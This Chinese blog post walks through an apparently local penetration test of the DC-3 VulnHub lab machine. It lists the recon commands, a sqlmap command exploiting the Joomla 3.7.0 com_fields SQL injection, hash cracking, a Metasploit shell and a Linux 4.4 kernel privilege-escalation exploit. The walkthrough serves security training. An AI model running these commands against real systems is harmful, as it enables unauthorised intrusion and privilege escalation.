DC-3-2靶场渗透测试

已于 2023-11-21 20:50:46 修改
阅读量78 收藏
点赞数
文章标签: 网络 安全 web安全 网络安全 linux
于 2023-11-21 20:49:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41567985/article/details/134540673
版权

项目概述

渗透测试目的

渗透测试范围

渗透测试时间

渗透测试环境

渗透测试人员

渗透测试方法

渗透测试流程

渗透测试方法与内容

渗透测试结果汇总

拿到关键信息Flag

本次渗透测试范围为本地,具体如下:

1-1:渗透测试对象

序号

系统名称

网站地址

内外网

1

      DC-3-2

http://192.168.21.26

内网

2023年11月19日 下午19:00下午20:45

在本地开展内网的vmware虚拟机中渗透测试。

TYR2

  • 信息收集
  • 主机存活扫描和端口扫描
  • 全端口扫描

nmap -p- 192.168.21.26

        

80端口

        

  • 目录扫描

        

/administrator目录

        

  • 信息整理

可以知道这个joomla是一个框架并且可以使用joomscan可以扫描这个框架存在的一些漏洞

        

可以知道这个网站是使用Joomla ,我们可以使用msf去查找这个joomla的版本

  • 使用kali自带的joomscan扫描一下

        

得知Joomla的版本是3.7.0

因为kali中搜集了很多框架和中间件的漏洞利用exp,我们可以去搜索一下

  • 使用命令searchsploit Joomla 3.7.0

        

查看txt文件发现可以使用sqlmap进行跑数据库

        

  • 漏洞验证与利用
  • Sql注入漏洞验证与利用

Sqlmap验证

sqlmap -u "http://192.168.21.34/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

发现确实存在sql注入,并且使用sqlmap成功验证

        

sqlmap -u "http://192.168.21.34/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

更改红色字段即可

  • 接下来就是跑表和字段了...

         表:

                

         字段:

                

  • 解密hash

使用kali自带的john解密hash

        

就可以正常登录网站了

然后使用msf自带的模块进行利用

search Joomla

    

        

  • 再使用 6 --配置参数,成功拿到shell

        

记得升级一下sehll

查看/etc/passwd目录下有一个dc3的普通用户

查看内核为linux 4.4.0

  • kali中使用命令

searchsploit "linux 4.4.x"

        

复制出来打开看看

        

意思是要去下载这个压缩包-并且放在kali里开启临时服务器

把要解压的tar文件和zip文件都解压一下

命令:    unzip -o -d /tmp zip //文件解压缩

tar -xf tar文件 //tar文件解压缩

        

       解压缩后进入到 ebpf_mapfd_doubleput_exploit 目录 运行这两个文件

提权

  • 运行文件

        

  • 拿到flag

        

靶场DC-3-2渗透主要是考到了一个中间件和框架的认识,如果认识,懂得去搜索利用,那么这个靶场就会变得很简单

TYR2
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【技术分享】实战dc-3靶场及其技巧讲解
军火库
07-22 287
本期技术文章将与大家分享小星实战“dc-3靶场”的经验,通过分析其渗透过程以及不同的getshell方法,与大家共同探讨该靶场的破解技巧。
DC-3靶场实战详解
a310034188的博客
01-26 9176
环境安装 前面安装了老版本的DC-3几次,nmap都扫描不到机器,后来琢磨了很久也找不到问题,然后我去官网重新下载了个就没问题了 官网地址:https://www.vulnhub.com/entry/dc-32,312/ KALI和DC-3都用NAT模式. DC-3需要多修改一些东西 把IDE里面的改成IDE 0:0 都完成后开启KALI与DC-3 寻找FLAG 信息收集 1.首先确认kali与DC-3所在网段 ip add 确认kali与DC-3所在网段为192.168.79.0/2
靶机DC-3—WP
m0_66638011的博客
05-17 1084
DC系列靶机是一系列专门为渗透测试网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试
vulnhub靶场DC-3
qq_58091216的博客
01-08 1111
如果您的网站正在运行 Joomla,您可以对您的网站使用 JoomScan 实用程序来发现漏洞或仅提供有助于攻击您网站的一般信息。漏洞扫描器(JoomScan)是一个开源项目,其主要目的是实现漏洞检测的自动化,以增强Joomla CMS开发的安全性。与以前的 DC 版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有任何线索。Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。我们可以看到用户名爆破出来了,密码是加密的,我们进行解密。
DC-3靶场搭建及渗透实战详细过程(DC靶场系列)
金 帛的博客
07-27 5080
DC-3靶场渗透过程
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
vuInhub靶场实战系列-DC-9实战
最新发布
06-02
vuInhub靶场实战系列-DC-9实战
DC系列漏洞靶场-渗透测试学习复现(DC-3)
W983079520的博客
12-02 1281
DC-3是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了linux内核漏洞提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-3靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口只有一个: 80(http默认端口)。 4 访问web 访问we
DC-3靶场渗透】
一纸荒芜的博客
12-12 2681
DC3靶场打靶记录!
靶机4 DC-3(过程超详细)
honest_gg的博客
09-26 977
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场
DC3靶场通过详细记录】
博客
12-16 1136
DC3靶场通关记录-----sqlmap的使用:sql注入john爆破密码:对加密的密码进行解密msf的使用:生成反弹shell的木马和进行反弹shell监听linux内核漏洞检测脚本:linux-exploit-suggester.sh,可以直接在github下载,下载链接。
网络安全【技术分享】实战dc-3靶场及其技巧讲解
liuhyusb的博客
07-20 334
本期技术文章将与大家分享小星实战“dc-3靶场”的经验,通过分析其渗透过程以及不同的getshell方法,与大家共同探讨该靶场的破解技巧。
DC3靶场渗透流程(超详细)
m0_64583632的博客
04-04 1048
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
DC-3靶场
2301_76690905的博客
12-14 173
cp /usr/share/exploitdb/exploits/php/webapps/42033.txt /home/kali/桌面/42033.txt。cp /usr/share/exploitdb/exploits/linux/local/39772.txt /home/kali/桌面/39772.txt。下载后解压会有一个DC-3.ova文件,直接在vm虚拟机点击左上角打开-->文件--.选中这个.ova文件就能创建靶场,kali和靶机都调整至NAT模式。使用“-v”(详细)来尝试更多的组合。
DC-5靶场渗透过程中,怎样挂载木马文件
06-02
DC-5 靶场渗透过程中,如果要挂载木马文件,可以按照以下步骤进行操作: 1. 找到可写入的目录:可以使用 `ls -al` 命令查看目录权限,找到可写入的目录。通常会有一些临时目录或者上传目录是可写入的。 2. 上传...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值